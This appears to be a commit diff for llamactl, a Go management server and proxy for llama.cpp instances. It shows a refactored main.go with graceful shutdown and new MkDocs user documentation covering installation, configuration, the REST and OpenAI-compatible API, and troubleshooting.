fmt.Printf("Commit hash: %s\n", commitHash)
fmt.Printf("Build time: %s\n", buildTime)
return
}
configPath := os.Getenv("LLAMACTL_CONFIG_PATH")
cfg, err := config.LoadConfig(configPath)
if err != nil { if err != nil {
fmt.Printf("Error loading config: %v\n", err) fmt.Printf("Error loading config: %v\n", err)
fmt.Println("Using default configuration.") fmt.Println("Using default configuration.")
} }
// Create the log directory if it doesn't exist // Set version information
err = os.MkdirAll(config.Instances.LogDirectory, 0755) cfg.Version = version
if err != nil { cfg.CommitHash = commitHash
fmt.Printf("Error creating log directory: %v\n", err) cfg.BuildTime = buildTime
return
// Create the data directory if it doesn't exist
if cfg.Instances.AutoCreateDirs {
if err := os.MkdirAll(cfg.Instances.InstancesDir, 0755); err != nil {
fmt.Printf("Error creating config directory %s: %v\n", cfg.Instances.InstancesDir, err)
fmt.Println("Persistence will not be available.")
}
if err := os.MkdirAll(cfg.Instances.LogsDir, 0755); err != nil {
fmt.Printf("Error creating log directory %s: %v\n", cfg.Instances.LogsDir, err)
fmt.Println("Instance logs will not be available.")
}
} }
// Initialize the instance manager // Initialize the instance manager
instanceManager := llamactl.NewInstanceManager(config.Instances) instanceManager := manager.NewInstanceManager(cfg.Instances)
// Create a new handler with the instance manager // Create a new handler with the instance manager
handler := llamactl.NewHandler(instanceManager, config) handler := server.NewHandler(instanceManager, cfg)
// Setup the router with the handler // Setup the router with the handler
r := llamactl.SetupRouter(handler) r := server.SetupRouter(handler)
// Start the server with the router // Handle graceful shutdown
fmt.Printf("Starting llamactl on port %d...\n", config.Server.Port) stop := make(chan os.Signal, 1)
http.ListenAndServe(fmt.Sprintf("%s:%d", config.Server.Host, config.Server.Port), r) signal.Notify(stop, os.Interrupt, syscall.SIGTERM)
server := http.Server{
Addr: fmt.Sprintf("%s:%d", cfg.Server.Host, cfg.Server.Port),
Handler: r,
}
go func() {
fmt.Printf("Llamactl server listening on %s:%d\n", cfg.Server.Host, cfg.Server.Port)
if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
fmt.Printf("Error starting server: %v\n", err)
}
}()
// Wait for shutdown signal
<-stop
fmt.Println("Shutting down server...")
if err := server.Close(); err != nil {
fmt.Printf("Error shutting down server: %v\n", err)
} else {
fmt.Println("Server shut down gracefully.")
}
// Wait for all instances to stop
instanceManager.Shutdown()
fmt.Println("Exiting llamactl.")
} }

4
docs-requirements.txt Normal file
View File

@@ -0,0 +1,4 @@
mkdocs-material==9.5.3
mkdocs==1.5.3
pymdown-extensions==10.7
mkdocs-git-revision-date-localized-plugin==1.2.4

View File

@@ -0,0 +1,150 @@
# Configuration
llamactl can be configured via configuration files or environment variables. Configuration is loaded in the following order of precedence:
```
Defaults < Configuration file < Environment variables
```
llamactl works out of the box with sensible defaults, but you can customize the behavior to suit your needs.
## Default Configuration
Here's the default configuration with all available options:
```yaml
server:
host: "0.0.0.0" # Server host to bind to
port: 8080 # Server port to bind to
allowed_origins: ["*"] # Allowed CORS origins (default: all)
enable_swagger: false # Enable Swagger UI for API docs
instances:
port_range: [8000, 9000] # Port range for instances
data_dir: ~/.local/share/llamactl # Data directory (platform-specific, see below)
configs_dir: ~/.local/share/llamactl/instances # Instance configs directory
logs_dir: ~/.local/share/llamactl/logs # Logs directory
auto_create_dirs: true # Auto-create data/config/logs dirs if missing
max_instances: -1 # Max instances (-1 = unlimited)
max_running_instances: -1 # Max running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: llama-server # Path to llama-server executable
default_auto_restart: true # Auto-restart new instances by default
default_max_restarts: 3 # Max restarts for new instances
default_restart_delay: 5 # Restart delay (seconds) for new instances
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Idle instance timeout check in minutes
auth:
require_inference_auth: true # Require auth for inference endpoints
inference_keys: [] # Keys for inference endpoints
require_management_auth: true # Require auth for management endpoints
management_keys: [] # Keys for management endpoints
```
## Configuration Files
### Configuration File Locations
Configuration files are searched in the following locations (in order of precedence):
**Linux:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/.config/llamactl/config.yaml`
- `/etc/llamactl/config.yaml`
**macOS:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `$HOME/Library/Application Support/llamactl/config.yaml`
- `/Library/Application Support/llamactl/config.yaml`
**Windows:**
- `./llamactl.yaml` or `./config.yaml` (current directory)
- `%APPDATA%\llamactl\config.yaml`
- `%USERPROFILE%\llamactl\config.yaml`
- `%PROGRAMDATA%\llamactl\config.yaml`
You can specify the path to config file with `LLAMACTL_CONFIG_PATH` environment variable.
## Configuration Options
### Server Configuration
```yaml
server:
host: "0.0.0.0" # Server host to bind to (default: "0.0.0.0")
port: 8080 # Server port to bind to (default: 8080)
allowed_origins: ["*"] # CORS allowed origins (default: ["*"])
enable_swagger: false # Enable Swagger UI (default: false)
```
**Environment Variables:**
- `LLAMACTL_HOST` - Server host
- `LLAMACTL_PORT` - Server port
- `LLAMACTL_ALLOWED_ORIGINS` - Comma-separated CORS origins
- `LLAMACTL_ENABLE_SWAGGER` - Enable Swagger UI (true/false)
### Instance Configuration
```yaml
instances:
port_range: [8000, 9000] # Port range for instances (default: [8000, 9000])
data_dir: "~/.local/share/llamactl" # Directory for all llamactl data (default varies by OS)
configs_dir: "~/.local/share/llamactl/instances" # Directory for instance configs (default: data_dir/instances)
logs_dir: "~/.local/share/llamactl/logs" # Directory for instance logs (default: data_dir/logs)
auto_create_dirs: true # Automatically create data/config/logs directories (default: true)
max_instances: -1 # Maximum instances (-1 = unlimited)
max_running_instances: -1 # Maximum running instances (-1 = unlimited)
enable_lru_eviction: true # Enable LRU eviction for idle instances
llama_executable: "llama-server" # Path to llama-server executable
default_auto_restart: true # Default auto-restart setting
default_max_restarts: 3 # Default maximum restart attempts
default_restart_delay: 5 # Default restart delay in seconds
default_on_demand_start: true # Default on-demand start setting
on_demand_start_timeout: 120 # Default on-demand start timeout in seconds
timeout_check_interval: 5 # Default instance timeout check interval in minutes
```
**Environment Variables:**
- `LLAMACTL_INSTANCE_PORT_RANGE` - Port range (format: "8000-9000" or "8000,9000")
- `LLAMACTL_DATA_DIRECTORY` - Data directory path
- `LLAMACTL_INSTANCES_DIR` - Instance configs directory path
- `LLAMACTL_LOGS_DIR` - Log directory path
- `LLAMACTL_AUTO_CREATE_DATA_DIR` - Auto-create data/config/logs directories (true/false)
- `LLAMACTL_MAX_INSTANCES` - Maximum number of instances
- `LLAMACTL_MAX_RUNNING_INSTANCES` - Maximum number of running instances
- `LLAMACTL_ENABLE_LRU_EVICTION` - Enable LRU eviction for idle instances
- `LLAMACTL_LLAMA_EXECUTABLE` - Path to llama-server executable
- `LLAMACTL_DEFAULT_AUTO_RESTART` - Default auto-restart setting (true/false)
- `LLAMACTL_DEFAULT_MAX_RESTARTS` - Default maximum restarts
- `LLAMACTL_DEFAULT_RESTART_DELAY` - Default restart delay in seconds
- `LLAMACTL_DEFAULT_ON_DEMAND_START` - Default on-demand start setting (true/false)
- `LLAMACTL_ON_DEMAND_START_TIMEOUT` - Default on-demand start timeout in seconds
- `LLAMACTL_TIMEOUT_CHECK_INTERVAL` - Default instance timeout check interval in minutes
### Authentication Configuration
```yaml
auth:
require_inference_auth: true # Require API key for OpenAI endpoints (default: true)
inference_keys: [] # List of valid inference API keys
require_management_auth: true # Require API key for management endpoints (default: true)
management_keys: [] # List of valid management API keys
```
**Environment Variables:**
- `LLAMACTL_REQUIRE_INFERENCE_AUTH` - Require auth for OpenAI endpoints (true/false)
- `LLAMACTL_INFERENCE_KEYS` - Comma-separated inference API keys
- `LLAMACTL_REQUIRE_MANAGEMENT_AUTH` - Require auth for management endpoints (true/false)
- `LLAMACTL_MANAGEMENT_KEYS` - Comma-separated management API keys
## Command Line Options
View all available command line options:
```bash
llamactl --help
```
You can also override configuration using command line flags when starting llamactl.

View File

@@ -0,0 +1,70 @@
# Installation
This guide will walk you through installing Llamactl on your system.
## Prerequisites
You need `llama-server` from [llama.cpp](https://github.com/ggml-org/llama.cpp) installed:
**Quick install methods:**
```bash
# Homebrew (macOS/Linux)
brew install llama.cpp
# Winget (Windows)
winget install llama.cpp
```
Or build from source - see llama.cpp docs
## Installation Methods
### Option 1: Download Binary (Recommended)
Download the latest release from the [GitHub releases page](https://github.com/lordmathis/llamactl/releases):
```bash
# Linux/macOS - Get latest version and download
LATEST_VERSION=$(curl -s https://api.github.com/repos/lordmathis/llamactl/releases/latest | grep '"tag_name":' | sed -E 's/.*"([^"]+)".*/\1/')
curl -L https://github.com/lordmathis/llamactl/releases/download/${LATEST_VERSION}/llamactl-${LATEST_VERSION}-$(uname -s | tr '[:upper:]' '[:lower:]')-$(uname -m).tar.gz | tar -xz
sudo mv llamactl /usr/local/bin/
# Or download manually from:
# https://github.com/lordmathis/llamactl/releases/latest
# Windows - Download from releases page
```
### Option 2: Build from Source
Requirements:
- Go 1.24 or later
- Node.js 22 or later
- Git
If you prefer to build from source:
```bash
# Clone the repository
git clone https://github.com/lordmathis/llamactl.git
cd llamactl
# Build the web UI
cd webui && npm ci && npm run build && cd ..
# Build the application
go build -o llamactl ./cmd/server
```
## Verification
Verify your installation by checking the version:
```bash
llamactl --version
```
## Next Steps
Now that Llamactl is installed, continue to the [Quick Start](quick-start.md) guide to get your first instance running!

View File

@@ -0,0 +1,143 @@
# Quick Start
This guide will help you get Llamactl up and running in just a few minutes.
## Step 1: Start Llamactl
Start the Llamactl server:
```bash
llamactl
```
By default, Llamactl will start on `http://localhost:8080`.
## Step 2: Access the Web UI
Open your web browser and navigate to:
```
http://localhost:8080
```
Login with the management API key. By default it is generated during server startup. Copy it from the terminal output.
You should see the Llamactl web interface.
## Step 3: Create Your First Instance
1. Click the "Add Instance" button
2. Fill in the instance configuration:
- **Name**: Give your instance a descriptive name
- **Model Path**: Path to your Llama.cpp model file
- **Additional Options**: Any extra Llama.cpp parameters
3. Click "Create Instance"
## Step 4: Start Your Instance
Once created, you can:
- **Start** the instance by clicking the start button
- **Monitor** its status in real-time
- **View logs** by clicking the logs button
- **Stop** the instance when needed
## Example Configuration
Here's a basic example configuration for a Llama 2 model:
```json
{
"name": "llama2-7b",
"model_path": "/path/to/llama-2-7b-chat.gguf",
"options": {
"threads": 4,
"context_size": 2048
}
}
```
## Using the API
You can also manage instances via the REST API:
```bash
# List all instances
curl http://localhost:8080/api/instances
# Create a new instance
curl -X POST http://localhost:8080/api/instances \
-H "Content-Type: application/json" \
-d '{
"name": "my-model",
"model_path": "/path/to/model.gguf",
}'
# Start an instance
curl -X POST http://localhost:8080/api/instances/my-model/start
```
## OpenAI Compatible API
Llamactl provides OpenAI-compatible endpoints, making it easy to integrate with existing OpenAI client libraries and tools.
### Chat Completions
Once you have an instance running, you can use it with the OpenAI-compatible chat completions endpoint:
```bash
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-d '{
"model": "my-model",
"messages": [
{
"role": "user",
"content": "Hello! Can you help me write a Python function?"
}
],
"max_tokens": 150,
"temperature": 0.7
}'
```
### Using with Python OpenAI Client
You can also use the official OpenAI Python client:
```python
from openai import OpenAI
# Point the client to your Llamactl server
client = OpenAI(
base_url="http://localhost:8080/v1",
api_key="not-needed" # Llamactl doesn't require API keys by default
)
# Create a chat completion
response = client.chat.completions.create(
model="my-model", # Use the name of your instance
messages=[
{"role": "user", "content": "Explain quantum computing in simple terms"}
],
max_tokens=200,
temperature=0.7
)
print(response.choices[0].message.content)
```
### List Available Models
Get a list of running instances (models) in OpenAI-compatible format:
```bash
curl http://localhost:8080/v1/models
```
## Next Steps
- Manage instances [Managing Instances](../user-guide/managing-instances.md)
- Explore the [API Reference](../user-guide/api-reference.md)
- Configure advanced settings in the [Configuration](configuration.md) guide

Binary file not shown.

After

Width:  |  Height:  |  Size: 69 KiB

BIN
docs/images/dashboard.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 44 KiB

41
docs/index.md Normal file
View File

@@ -0,0 +1,41 @@
# Llamactl Documentation
Welcome to the Llamactl documentation! **Management server and proxy for multiple llama.cpp instances with OpenAI-compatible API routing.**
![Dashboard Screenshot](images/dashboard.png)
## What is Llamactl?
Llamactl is designed to simplify the deployment and management of llama-server instances. It provides a modern solution for running multiple large language models with centralized management.
## Features
🚀 **Multiple Model Serving**: Run different models simultaneously (7B for speed, 70B for quality)
🔗 **OpenAI API Compatible**: Drop-in replacement - route requests by model name
🌐 **Web Dashboard**: Modern React UI for visual management (unlike CLI-only tools)
🔐 **API Key Authentication**: Separate keys for management vs inference access
📊 **Instance Monitoring**: Health checks, auto-restart, log management
**Smart Resource Management**: Idle timeout, LRU eviction, and configurable instance limits
💡 **On-Demand Instance Start**: Automatically launch instances upon receiving OpenAI-compatible API requests
💾 **State Persistence**: Ensure instances remain intact across server restarts
## Quick Links
- [Installation Guide](getting-started/installation.md) - Get Llamactl up and running
- [Configuration Guide](getting-started/configuration.md) - Detailed configuration options
- [Quick Start](getting-started/quick-start.md) - Your first steps with Llamactl
- [Managing Instances](user-guide/managing-instances.md) - Instance lifecycle management
- [API Reference](user-guide/api-reference.md) - Complete API documentation
## Getting Help
If you need help or have questions:
- Check the [Troubleshooting](user-guide/troubleshooting.md) guide
- Visit the [GitHub repository](https://github.com/lordmathis/llamactl)
- Review the [Configuration Guide](getting-started/configuration.md) for advanced settings
## License
MIT License - see the [LICENSE](https://github.com/lordmathis/llamactl/blob/main/LICENSE) file.

View File

@@ -0,0 +1,412 @@
# API Reference
Complete reference for the Llamactl REST API.
## Base URL
All API endpoints are relative to the base URL:
```
http://localhost:8080/api/v1
```
## Authentication
Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
```bash
curl -H "Authorization: Bearer <your-api-key>" \
http://localhost:8080/api/v1/instances
```
The server supports two types of API keys:
- **Management API Keys**: Required for instance management operations (CRUD operations on instances)
- **Inference API Keys**: Required for OpenAI-compatible inference endpoints
## System Endpoints
### Get Llamactl Version
Get the version information of the llamactl server.
```http
GET /api/v1/version
```
**Response:**
```
Version: 1.0.0
Commit: abc123
Build Time: 2024-01-15T10:00:00Z
```
### Get Llama Server Help
Get help text for the llama-server command.
```http
GET /api/v1/server/help
```
**Response:** Plain text help output from `llama-server --help`
### Get Llama Server Version
Get version information of the llama-server binary.
```http
GET /api/v1/server/version
```
**Response:** Plain text version output from `llama-server --version`
### List Available Devices
List available devices for llama-server.
```http
GET /api/v1/server/devices
```
**Response:** Plain text device list from `llama-server --list-devices`
## Instances
### List All Instances
Get a list of all instances.
```http
GET /api/v1/instances
```
**Response:**
```json
[
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
]
```
### Get Instance Details
Get detailed information about a specific instance.
```http
GET /api/v1/instances/{name}
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Create Instance
Create and start a new instance.
```http
POST /api/v1/instances/{name}
```
**Request Body:** JSON object with instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Update Instance
Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
```http
PUT /api/v1/instances/{name}
```
**Request Body:** JSON object with configuration fields to update.
**Response:**
```json
{
"name": "llama2-7b",
"status": "running",
"created": 1705312200
}
```
### Delete Instance
Stop and remove an instance.
```http
DELETE /api/v1/instances/{name}
```
**Response:** `204 No Content`
## Instance Operations
### Start Instance
Start a stopped instance.
```http
POST /api/v1/instances/{name}/start
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "starting",
"created": 1705312200
}
```
**Error Responses:**
- `409 Conflict`: Maximum number of running instances reached
- `500 Internal Server Error`: Failed to start instance
### Stop Instance
Stop a running instance.
```http
POST /api/v1/instances/{name}/stop
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "stopping",
"created": 1705312200
}
```
### Restart Instance
Restart an instance (stop then start).
```http
POST /api/v1/instances/{name}/restart
```
**Response:**
```json
{
"name": "llama2-7b",
"status": "restarting",
"created": 1705312200
}
```
### Get Instance Logs
Retrieve instance logs.
```http
GET /api/v1/instances/{name}/logs
```
**Query Parameters:**
- `lines`: Number of lines to return (default: all lines, use -1 for all)
**Response:** Plain text log output
**Example:**
```bash
curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
```
### Proxy to Instance
Proxy HTTP requests directly to the llama-server instance.
```http
GET /api/v1/instances/{name}/proxy/*
POST /api/v1/instances/{name}/proxy/*
```
This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
**Example - Check Instance Health:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/proxy/health
```
This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
**Error Responses:**
- `503 Service Unavailable`: Instance is not running
## OpenAI-Compatible API
Llamactl provides OpenAI-compatible endpoints for inference operations.
### List Models
List all instances in OpenAI-compatible format.
```http
GET /v1/models
```
**Response:**
```json
{
"object": "list",
"data": [
{
"id": "llama2-7b",
"object": "model",
"created": 1705312200,
"owned_by": "llamactl"
}
]
}
```
### Chat Completions, Completions, Embeddings
All OpenAI-compatible inference endpoints are available:
```http
POST /v1/chat/completions
POST /v1/completions
POST /v1/embeddings
POST /v1/rerank
POST /v1/reranking
```
**Request Body:** Standard OpenAI format with `model` field specifying the instance name
**Example:**
```json
{
"model": "llama2-7b",
"messages": [
{
"role": "user",
"content": "Hello, how are you?"
}
]
}
```
The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
**Error Responses:**
- `400 Bad Request`: Invalid request body or missing model name
- `503 Service Unavailable`: Instance is not running and on-demand start is disabled
- `409 Conflict`: Cannot start instance due to maximum instances limit
## Instance Status Values
Instances can have the following status values:
- `stopped`: Instance is not running
- `running`: Instance is running and ready to accept requests
- `failed`: Instance failed to start or crashed
## Error Responses
All endpoints may return error responses in the following format:
```json
{
"error": "Error message description"
}
```
### Common HTTP Status Codes
- `200`: Success
- `201`: Created
- `204`: No Content (successful deletion)
- `400`: Bad Request (invalid parameters or request body)
- `401`: Unauthorized (missing or invalid API key)
- `403`: Forbidden (insufficient permissions)
- `404`: Not Found (instance not found)
- `409`: Conflict (instance already exists, max instances reached)
- `500`: Internal Server Error
- `503`: Service Unavailable (instance not running)
## Examples
### Complete Instance Lifecycle
```bash
# Create and start instance
curl -X POST http://localhost:8080/api/v1/instances/my-model \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"model": "/models/llama-2-7b.gguf"
}'
# Check instance status
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
# Get instance logs
curl -H "Authorization: Bearer your-api-key" \
"http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
# Use OpenAI-compatible chat completions
curl -X POST http://localhost:8080/v1/chat/completions \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-inference-api-key" \
-d '{
"model": "my-model",
"messages": [
{"role": "user", "content": "Hello!"}
],
"max_tokens": 100
}'
# Stop instance
curl -X POST -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model/stop
# Delete instance
curl -X DELETE -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances/my-model
```
### Using the Proxy Endpoint
You can also directly proxy requests to the llama-server instance:
```bash
# Direct proxy to instance (bypasses OpenAI compatibility layer)
curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your-api-key" \
-d '{
"prompt": "Hello, world!",
"n_predict": 50
}'
```
## Swagger Documentation
If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
```
http://localhost:8080/swagger/
```
This provides a complete interactive interface for testing all API endpoints.

View File

@@ -0,0 +1,190 @@
# Managing Instances
Learn how to effectively manage your Llama.cpp instances with Llamactl through both the Web UI and API.
## Overview
Llamactl provides two ways to manage instances:
- **Web UI**: Accessible at `http://localhost:8080` with an intuitive dashboard
- **REST API**: Programmatic access for automation and integration
![Dashboard Screenshot](../images/dashboard.png)
### Authentication
If authentication is enabled:
1. Navigate to the web UI
2. Enter your credentials
3. Bearer token is stored for the session
### Theme Support
- Switch between light and dark themes
- Setting is remembered across sessions
## Instance Cards
Each instance is displayed as a card showing:
- **Instance name**
- **Health status badge** (unknown, ready, error, failed)
- **Action buttons** (start, stop, edit, logs, delete)
## Create Instance
### Via Web UI
![Create Instance Screenshot](../images/create_instance.png)
1. Click the **"Create Instance"** button on the dashboard
2. Enter a unique **Name** for your instance (only required field)
3. Configure model source (choose one):
- **Model Path**: Full path to your downloaded GGUF model file
- **HuggingFace Repo**: Repository name (e.g., `unsloth/gemma-3-27b-it-GGUF`)
- **HuggingFace File**: Specific file within the repo (optional, uses default if not specified)
4. Configure optional instance management settings:
- **Auto Restart**: Automatically restart instance on failure
- **Max Restarts**: Maximum number of restart attempts
- **Restart Delay**: Delay in seconds between restart attempts
- **On Demand Start**: Start instance when receiving a request to the OpenAI compatible endpoint
- **Idle Timeout**: Minutes before stopping idle instance (set to 0 to disable)
5. Configure optional llama-server backend options:
- **Threads**: Number of CPU threads to use
- **Context Size**: Context window size (ctx_size)
- **GPU Layers**: Number of layers to offload to GPU
- **Port**: Network port (auto-assigned by llamactl if not specified)
- **Additional Parameters**: Any other llama-server command line options (see [llama-server documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/server/README.md))
6. Click **"Create"** to save the instance
### Via API
```bash
# Create instance with local model file
curl -X POST http://localhost:8080/api/instances/my-instance \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"model": "/path/to/model.gguf",
"threads": 8,
"ctx_size": 4096
}
}'
# Create instance with HuggingFace model
curl -X POST http://localhost:8080/api/instances/gemma-3-27b \
-H "Content-Type: application/json" \
-d '{
"backend_type": "llama_cpp",
"backend_options": {
"hf_repo": "unsloth/gemma-3-27b-it-GGUF",
"hf_file": "gemma-3-27b-it-GGUF.gguf",
"gpu_layers": 32
},
"auto_restart": true,
"max_restarts": 3
}'
```
## Start Instance
### Via Web UI
1. Click the **"Start"** button on an instance card
2. Watch the status change to "Unknown"
3. Monitor progress in the logs
4. Instance status changes to "Ready" when ready
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/start
```
## Stop Instance
### Via Web UI
1. Click the **"Stop"** button on an instance card
2. Instance gracefully shuts down
### Via API
```bash
curl -X POST http://localhost:8080/api/instances/{name}/stop
```
## Edit Instance
### Via Web UI
1. Click the **"Edit"** button on an instance card
2. Modify settings in the configuration dialog
3. Changes require instance restart to take effect
4. Click **"Update & Restart"** to apply changes
### Via API
Modify instance settings:
```bash
curl -X PUT http://localhost:8080/api/instances/{name} \
-H "Content-Type: application/json" \
-d '{
"backend_options": {
"threads": 8,
"context_size": 4096
}
}'
```
!!! note
Configuration changes require restarting the instance to take effect.
## View Logs
### Via Web UI
1. Click the **"Logs"** button on any instance card
2. Real-time log viewer opens
### Via API
Check instance status in real-time:
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/logs
```
## Delete Instance
### Via Web UI
1. Click the **"Delete"** button on an instance card
2. Only stopped instances can be deleted
3. Confirm deletion in the dialog
### Via API
```bash
curl -X DELETE http://localhost:8080/api/instances/{name}
```
## Instance Proxy
Llamactl proxies all requests to the underlying llama-server instances.
```bash
# Get instance details
curl http://localhost:8080/api/instances/{name}/proxy/
```
Check llama-server [docs](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md) for more information.
### Instance Health
#### Via Web UI
1. The health status badge is displayed on each instance card
#### Via API
Check the health status of your instances:
```bash
curl http://localhost:8080/api/instances/{name}/proxy/health
```

View File

@@ -0,0 +1,160 @@
# Troubleshooting
Issues specific to Llamactl deployment and operation.
## Configuration Issues
### Invalid Configuration
**Problem:** Invalid configuration preventing startup
**Solutions:**
1. Use minimal configuration:
```yaml
server:
host: "0.0.0.0"
port: 8080
instances:
port_range: [8000, 9000]
```
2. Check data directory permissions:
```bash
# Ensure data directory is writable (default: ~/.local/share/llamactl)
mkdir -p ~/.local/share/llamactl/{instances,logs}
```
## Instance Management Issues
### Model Loading Failures
**Problem:** Instance fails to start with model loading errors
**Common Solutions:**
- **llama-server not found:** Ensure `llama-server` binary is in PATH
- **Wrong model format:** Ensure model is in GGUF format
- **Insufficient memory:** Use smaller model or reduce context size
- **Path issues:** Use absolute paths to model files
### Memory Issues
**Problem:** Out of memory errors or system becomes unresponsive
**Solutions:**
1. **Reduce context size:**
```json
{
"n_ctx": 1024
}
```
2. **Use quantized models:**
- Try Q4_K_M instead of higher precision models
- Use smaller model variants (7B instead of 13B)
### GPU Configuration
**Problem:** GPU not being used effectively
**Solutions:**
1. **Configure GPU layers:**
```json
{
"n_gpu_layers": 35
}
```
### Advanced Instance Issues
**Problem:** Complex model loading, performance, or compatibility issues
Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
**Resources:**
- **llama.cpp Documentation:** [https://github.com/ggml/llama.cpp](https://github.com/ggml/llama.cpp)
- **llama.cpp Issues:** [https://github.com/ggml/llama.cpp/issues](https://github.com/ggml/llama.cpp/issues)
- **llama.cpp Discussions:** [https://github.com/ggml/llama.cpp/discussions](https://github.com/ggml/llama.cpp/discussions)
**Testing directly with llama-server:**
```bash
# Test your model and parameters directly with llama-server
llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
```
This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
## API and Network Issues
### CORS Errors
**Problem:** Web UI shows CORS errors in browser console
**Solutions:**
1. **Configure allowed origins:**
```yaml
server:
allowed_origins:
- "http://localhost:3000"
- "https://yourdomain.com"
```
## Authentication Issues
**Problem:** API requests failing with authentication errors
**Solutions:**
1. **Disable authentication temporarily:**
```yaml
auth:
require_management_auth: false
require_inference_auth: false
```
2. **Configure API keys:**
```yaml
auth:
management_keys:
- "your-management-key"
inference_keys:
- "your-inference-key"
```
3. **Use correct Authorization header:**
```bash
curl -H "Authorization: Bearer your-api-key" \
http://localhost:8080/api/v1/instances
```
## Debugging and Logs
### Viewing Instance Logs
```bash
# Get instance logs via API
curl http://localhost:8080/api/v1/instances/{name}/logs
# Or check log files directly
tail -f ~/.local/share/llamactl/logs/{instance-name}.log
```
### Enable Debug Logging
```bash
export LLAMACTL_LOG_LEVEL=debug
llamactl
```
## Getting Help
When reporting issues, include:
1. **System information:**
```bash
llamactl --version
```
2. **Configuration file** (remove sensitive keys)
3. **Relevant log output**
4. **Steps to reproduce the issue**

68
mkdocs.yml Normal file
View File

@@ -0,0 +1,68 @@
site_name: Llamatl Documentation
site_description: User documentation for Llamatl - A management tool for Llama.cpp instances
site_author: Llamatl Team
site_url: https://llamactl.org
repo_name: lordmathis/llamactl
repo_url: https://github.com/lordmathis/llamactl
theme:
name: material
palette:
# Palette toggle for light mode
- scheme: default
primary: indigo
accent: indigo
toggle:
icon: material/brightness-7
name: Switch to dark mode
# Palette toggle for dark mode
- scheme: slate
primary: indigo
accent: indigo
toggle:
icon: material/brightness-4
name: Switch to light mode
features:
- navigation.tabs
- navigation.sections
- navigation.expand
- navigation.top
- search.highlight
- search.share
- content.code.copy
markdown_extensions:
- pymdownx.highlight:
anchor_linenums: true
- pymdownx.inlinehilite
- pymdownx.snippets
- pymdownx.superfences
- admonition
- pymdownx.details
- pymdownx.tabbed:
alternate_style: true
- attr_list
- md_in_html
- toc:
permalink: true
nav:
- Home: index.md
- Getting Started:
- Installation: getting-started/installation.md
- Quick Start: getting-started/quick-start.md
- Configuration: getting-started/configuration.md
- User Guide:
- Managing Instances: user-guide/managing-instances.md
- API Reference: user-guide/api-reference.md
- Troubleshooting: user-guide/troubleshooting.md
plugins:
- search
- git-revision-date-localized
extra:
social:
- icon: fontawesome/brands/github
link: https://github.com/lordmathis/llamactl

7
pkg/backends/backend.go Normal file
View File

@@ -0,0 +1,7 @@
package backends
type BackendType string
const (
BackendTypeLlamaCpp BackendType = "llama_cpp"
)

View File

@@ -1,4 +1,4 @@
package llamactl package llamacpp
import ( import (
"encoding/json" "encoding/json"
@@ -15,12 +15,12 @@ type LlamaServerOptions struct {
CPUMask string `json:"cpu_mask,omitempty"` CPUMask string `json:"cpu_mask,omitempty"`
CPURange string `json:"cpu_range,omitempty"` CPURange string `json:"cpu_range,omitempty"`
CPUStrict int `json:"cpu_strict,omitempty"` CPUStrict int `json:"cpu_strict,omitempty"`
Priority int `json:"priority,omitempty"` Prio int `json:"prio,omitempty"`
Poll int `json:"poll,omitempty"` Poll int `json:"poll,omitempty"`
CPUMaskBatch string `json:"cpu_mask_batch,omitempty"` CPUMaskBatch string `json:"cpu_mask_batch,omitempty"`
CPURangeBatch string `json:"cpu_range_batch,omitempty"` CPURangeBatch string `json:"cpu_range_batch,omitempty"`
CPUStrictBatch int `json:"cpu_strict_batch,omitempty"` CPUStrictBatch int `json:"cpu_strict_batch,omitempty"`
PriorityBatch int `json:"priority_batch,omitempty"` PrioBatch int `json:"prio_batch,omitempty"`
PollBatch int `json:"poll_batch,omitempty"` PollBatch int `json:"poll_batch,omitempty"`
CtxSize int `json:"ctx_size,omitempty"` CtxSize int `json:"ctx_size,omitempty"`
Predict int `json:"predict,omitempty"` Predict int `json:"predict,omitempty"`
@@ -83,7 +83,7 @@ type LlamaServerOptions struct {
Seed int `json:"seed,omitempty"` Seed int `json:"seed,omitempty"`
SamplingSeq string `json:"sampling_seq,omitempty"` SamplingSeq string `json:"sampling_seq,omitempty"`
